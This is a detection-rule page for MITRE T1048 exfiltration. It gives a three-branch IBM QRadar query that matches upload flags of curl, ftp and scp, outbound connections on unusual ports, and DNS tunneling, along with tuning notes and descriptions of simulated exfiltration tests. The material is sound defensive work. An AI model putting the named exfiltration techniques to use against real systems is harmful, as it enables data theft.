T1048 IBM QRadar · QRadar

Detect Exfiltration Over Alternative Protocol in IBM QRadar

Adversaries may steal data by exfiltrating it over a different protocol than that used for command and control. Data may be sent over FTP, SMTP, DNS, SMB, HTTP/S, or any other network protocol not serving as the primary C2 channel. Adversaries often encrypt or obfuscate these alternate channels. Common tools include curl, ftp.exe, WinSCP, and built-in OS utilities. DNS tunneling (encoding data in DNS query subdomains) is a particularly stealthy variant used by malware families like FrameworkPOS. IaaS and SaaS platforms (Exchange, SharePoint, GitHub, AWS S3) can also serve as exfiltration endpoints via cloud APIs or direct downloads.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
-- Branch 1: Exfil tool with upload indicators
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  sourceip,
  username,
  "Process Name",
  "Command",
  'ExfilToolUpload' AS DetectionBranch
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
  AND QIDNAME(qid) LIKE '%Process Create%'
  AND (
    LOWER("Process Name") LIKE '%ftp.exe%'
    OR LOWER("Process Name") LIKE '%curl.exe%'
    OR LOWER("Process Name") LIKE '%winscp.exe%'
    OR LOWER("Process Name") LIKE '%pscp.exe%'
    OR LOWER("Process Name") LIKE '%sftp.exe%'
    OR LOWER("Process Name") LIKE '%bitsadmin.exe%'
    OR LOWER("Process Name") LIKE '%robocopy.exe%'
  )
  AND (
    LOWER("Command") LIKE '%-t %'
    OR LOWER("Command") LIKE '%--upload-file%'
    OR LOWER("Command") LIKE '% put %'
    OR LOWER("Command") LIKE '%ftp://%'
    OR LOWER("Command") LIKE '%sftp://%'
    OR LOWER("Command") LIKE '%ftps://%'
    OR LOWER("Command") LIKE '%smtp://%'
    OR LOWER("Command") LIKE '%--mail-from%'
    OR LOWER("Command") LIKE '%--mail-rcpt%'
  )
  AND LOGSOURCESTARTTIME(logsourceid) > NOW() - 86400
UNION
-- Branch 2: Outbound connections on exfil ports from non-standard processes
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  sourceip,
  username,
  "Process Name",
  "Command",
  'SuspiciousOutboundPort' AS DetectionBranch
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
  AND QIDNAME(qid) LIKE '%Network Connect%'
  AND destinationport IN (21, 22, 25, 465, 587, 989, 990, 2121, 2222)
  AND NOT (destinationip LIKE '10.%' OR destinationip LIKE '192.168.%' OR destinationip LIKE '172.16.%' OR destinationip LIKE '127.%')
  AND NOT (
    LOWER("Process Name") LIKE '%svchost.exe%'
    OR LOWER("Process Name") LIKE '%lsass.exe%'
    OR LOWER("Process Name") LIKE '%outlook.exe%'
    OR LOWER("Process Name") LIKE '%thunderbird.exe%'
    OR LOWER("Process Name") LIKE '%filezilla.exe%'
  )
  AND LOGSOURCESTARTTIME(logsourceid) > NOW() - 86400
UNION
-- Branch 3: DNS tunneling via long subdomain queries
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  sourceip,
  username,
  "Process Name",
  "DNS Query" AS "Command",
  'DNSTunnelingSuspect' AS DetectionBranch
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
  AND QIDNAME(qid) LIKE '%DNS%'
  AND STRLEN("DNS Query") > 50
  AND NOT (
    "DNS Query" LIKE '%.microsoft.com'
    OR "DNS Query" LIKE '%.windows.com'
    OR "DNS Query" LIKE '%.google.com'
    OR "DNS Query" LIKE '%.amazon.com'
  )
  AND LOGSOURCESTARTTIME(logsourceid) > NOW() - 86400
ORDER BY EventTime DESC
high severity medium confidence

Three-branch AQL detection covering exfiltration tool usage with upload indicators, outbound connections on FTP/SMTP/SSH ports from unexpected processes, and DNS tunneling via anomalously long DNS subdomain queries. Unions all branches for unified analyst review.

Data Sources

IBM QRadar SIEMWindows Sysmon via QRadar DSMQRadar Network Activity

Required Tables

eventsflows

False Positives & Tuning

  • IT administrators using WinSCP or pscp.exe for legitimate file transfers to managed Linux servers — scope with approved source IPs or asset groups
  • CI/CD pipelines using curl to upload build artifacts to cloud storage (S3, Azure Blob) over port 443 — may match if port mapping triggers alt-port rules
  • DNS hostnames for cloud services or CDN providers with long CNAME chains exceeding the 50-char threshold — maintain an allowlist of known long-domain registrants
Download portable Sigma rule (.yml)

Other platforms for T1048

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1FTP Upload via Windows Built-in FTP Client

    Expected signal: Sysmon Event ID 1: Process Create with Image=ftp.exe, CommandLine containing '-s:%TEMP%\df00tech-ftp.txt'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:21 from ftp.exe. Sysmon Event ID 11: File create for the ftp script file in TEMP.

  2. Test 2curl SMTP Exfiltration Simulation

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '--mail-from', '--mail-rcpt', '--upload-file', 'smtp://'. Sysmon Event ID 3: Network Connection to 127.0.0.1:25 from curl.exe. The connection will fail but telemetry events fire.

  3. Test 3DNS Tunneling Simulation via Long Subdomain Queries

    Expected signal: Sysmon Event ID 22 (DNS Query): 25 events with QueryName containing long base64-encoded subdomains (>50 characters) under df00tech-test.com. DNS queries will fail to resolve (NXDOMAIN) but the DNS telemetry events are generated by the Sysmon DNS query logging provider.

  4. Test 4curl Upload via HTTP PUT (Alternative Protocol Exfiltration)

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '-X PUT', '-T', and 'http://127.0.0.1:8888'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8888. Sysmon Event ID 11: File Create for exfil_test.txt in TEMP directory.

  5. Test 5SCP File Exfiltration via OpenSSH (Linux/macOS)

    Expected signal: Auditd EXECVE record for scp with arguments including the destination host and port. Network connection event to 198.51.100.1:22. On systems with Sysmon for Linux: Process Create event (EventCode=1) for scp binary, Network Connect (EventCode=3) for the outbound SSH connection attempt.

Last updated: 2026-04-16 Research depth: deep
References (12)

Unlock Pro Content

Get the full detection package for T1048 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Sub-techniques (3)

Related Techniques

T1048.001Exfiltration Over Symmetric Encrypted Non-C2 ProtocolT1048.002Exfiltration Over Asymmetric Encrypted Non-C2 ProtocolT1048.003Exfiltration Over Unencrypted Non-C2 ProtocolT1041Exfiltration Over C2 ChannelT1567Exfiltration Over Web ServiceT1020Automated ExfiltrationT1029Scheduled TransferT1560Archive Collected DataT1005Data from Local SystemT1071Application Layer ProtocolT1572Protocol Tunneling

Same Tactic: Exfiltration

Popular Detections